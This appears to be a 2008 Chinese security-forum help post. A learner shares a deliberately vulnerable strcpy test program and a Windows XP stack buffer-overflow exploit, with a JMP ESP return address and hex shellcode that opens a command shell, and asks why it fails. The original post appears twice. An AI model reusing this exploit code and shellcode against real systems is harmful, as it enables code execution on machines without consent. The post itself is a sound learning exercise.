-
-
[求助]关于缓冲区溢出的一个解决不掉的问题
-
发表于: 2008-5-23 21:09
-
最近看了failwest大大的溢出教程,刚看了六讲,然后试着动手针对简单的漏洞程序写exploit,以加深对溢出原理的理解,途中碰到问题无法解决,特来看雪求助.
我的目标程序是这样的:
#include <stdio.h>
#include <string.h>
int main(int argc,char *argv[])
{
char buffer[256];
strcpy(buffer,argv[1]);//很显然此处strcpy()没有检查边界,所以存在溢出漏洞。
printf("%s",buffer);
return 0;
}
我的思路是这样的,系统给数组buffer[255]分配了256个字节的堆栈空间,那么我用260个字节的空间覆盖buffer[]以及EBP指针,然后接下来的一个字节就应该是EIP地址了,我把EIP地址覆盖成中文版通用的JMP ESP 地址0x7ffa4512,紧接着跟shellcode。那么目标程序就会溢出执行shellcode指令。
好了,我的exploit程序是这样的:
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main()
{
printf("Stack Overflow Exploit\n");
char exploit[500] = "E:\\exploit\\target\\Debug\\target.exe ";
char overflow[] =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAA";
char jmp_esp[]="\x12\x45\xFA\x7F";
char shellcode[] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54"
"\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C"
"\x8D\x45\xF4\x50\xB8\x77\x1D\x80\x7C\xFF\xD0\x8B\xE5\x55\x8B\xEC"
"\x33\xFF\x57\x83\xEC\x08\xC6\x45\xF4\x63\xC6\x45\xF5\x6F\xC6\x45"
"\xF6\x6D\xC6\x45\xF7\x6D\xC6\x45\xF8\x61\xC6\x45\xF9\x6E\xC6\x45"
"\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x63\xC6\x45\xFD\x6F\xC6\x45"
"\xFE\x6D\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";
strcat(exploit,overflow);
strcat(exploit,jmp_esp);
strcat(exploit,shellcode);
printf("Exploiting...\n");
WinExec(exploit ,0);
printf("Exploitation Finished\n");
return 0;
}
为了试验,我特地用262个字节填充,并把
//strcat(exploit,jmp_esp);
//strcat(exploit,shellcode);
给注释掉,就是让程序执行"target.exe 262个A",报错如图:
看到00004141,说明EIP中两个字节被AA覆盖证实前边的思路是对的。
然后我把两行注释去掉,让exploit完整执行,结果如图:
exploit确没有执行shellcode的指令。
关于这个shellcode作用是个打开DOS命令行的,我在本机验证可行的,如图:
这个shellcode是在xpsp2环境下写的,不是通用的shellcode。
原型是:
#include<windows.h>
int main()
{
LoadLibrary("msvcrt.dll");
system("command.com");
return 0;
}
LoadLibrary() system()地址都是xpsp2特有的。
这个试验我始终不能成功,感觉思路应该是对的,程序也应该没什么问题,但就是找不出错在哪里,请各位大大帮忙,让我弄清楚错误的原因。
我的目标程序是这样的:
#include <stdio.h>
#include <string.h>
int main(int argc,char *argv[])
{
char buffer[256];
strcpy(buffer,argv[1]);//很显然此处strcpy()没有检查边界,所以存在溢出漏洞。
printf("%s",buffer);
return 0;
}
我的思路是这样的,系统给数组buffer[255]分配了256个字节的堆栈空间,那么我用260个字节的空间覆盖buffer[]以及EBP指针,然后接下来的一个字节就应该是EIP地址了,我把EIP地址覆盖成中文版通用的JMP ESP 地址0x7ffa4512,紧接着跟shellcode。那么目标程序就会溢出执行shellcode指令。
好了,我的exploit程序是这样的:
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main()
{
printf("Stack Overflow Exploit\n");
char exploit[500] = "E:\\exploit\\target\\Debug\\target.exe ";
char overflow[] =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAA";
char jmp_esp[]="\x12\x45\xFA\x7F";
char shellcode[] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54"
"\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C"
"\x8D\x45\xF4\x50\xB8\x77\x1D\x80\x7C\xFF\xD0\x8B\xE5\x55\x8B\xEC"
"\x33\xFF\x57\x83\xEC\x08\xC6\x45\xF4\x63\xC6\x45\xF5\x6F\xC6\x45"
"\xF6\x6D\xC6\x45\xF7\x6D\xC6\x45\xF8\x61\xC6\x45\xF9\x6E\xC6\x45"
"\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x63\xC6\x45\xFD\x6F\xC6\x45"
"\xFE\x6D\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";
strcat(exploit,overflow);
strcat(exploit,jmp_esp);
strcat(exploit,shellcode);
printf("Exploiting...\n");
WinExec(exploit ,0);
printf("Exploitation Finished\n");
return 0;
}
为了试验,我特地用262个字节填充,并把
//strcat(exploit,jmp_esp);
//strcat(exploit,shellcode);
给注释掉,就是让程序执行"target.exe 262个A",报错如图:
看到00004141,说明EIP中两个字节被AA覆盖证实前边的思路是对的。
然后我把两行注释去掉,让exploit完整执行,结果如图:
exploit确没有执行shellcode的指令。
关于这个shellcode作用是个打开DOS命令行的,我在本机验证可行的,如图:
这个shellcode是在xpsp2环境下写的,不是通用的shellcode。
原型是:
#include<windows.h>
int main()
{
LoadLibrary("msvcrt.dll");
system("command.com");
return 0;
}
LoadLibrary() system()地址都是xpsp2特有的。
这个试验我始终不能成功,感觉思路应该是对的,程序也应该没什么问题,但就是找不出错在哪里,请各位大大帮忙,让我弄清楚错误的原因。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
既然argv[1]有长度限制,那么我不按原来的方式做,把代码该下:
#include <stdio.h> #include <string.h> #include <windows.h> int main() { printf("Stack Overflow Exploit\n"); char exploit[500] = "E:\\exploit\\target\\Debug\\target.exe "; char shellcode[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54" "\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C" "\x8D\x45\xF4\x50\xB8\x77\x1D\x80\x7C\xFF\xD0\x8B\xE5\x55\x8B\xEC" "\x33\xFF\x57\x83\xEC\x08\xC6\x45\xF4\x63\xC6\x45\xF5\x6F\xC6\x45" "\xF6\x6D\xC6\x45\xF7\x6D\xC6\x45\xF8\x61\xC6\x45\xF9\x6E\xC6\x45" "\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x63\xC6\x45\xFD\x6F\xC6\x45" "\xFE\x6D\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";//125 char nop[]= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAA";//135 char return_addr[]="AA"; strcat(exploit,shellcode); strcat(exploit,nop); strcat(exploit,return_addr); printf("Exploiting...\n"); WinExec(exploit ,0); printf("Exploitation Finished\n"); return 0; } 这里有两个问题: 1.shellcode长125字节,填充135个A,再加2个A总的是262个字节那按理应该报错00004141的,但实际运行结果确是  而当我再加2个A,即char return_addr[]="AAAA";那总的算来有264字节时,才报错00004141  这点是非常不明白。。 2.我最终是想要执行shellcode的指令,那char return_addr[]势必要的是shellcode的起始地址,这个如何找。虽然failwest大大的教程里有个:“用OllyDbg加载这个生成的PE文件进行动态调试,字符串拷贝函数过后的栈状态如图”然后就知道buff的起始地址了,但我这里我真还不知道如何找出来。 |
|
|
|
|
|
|
|
|
|
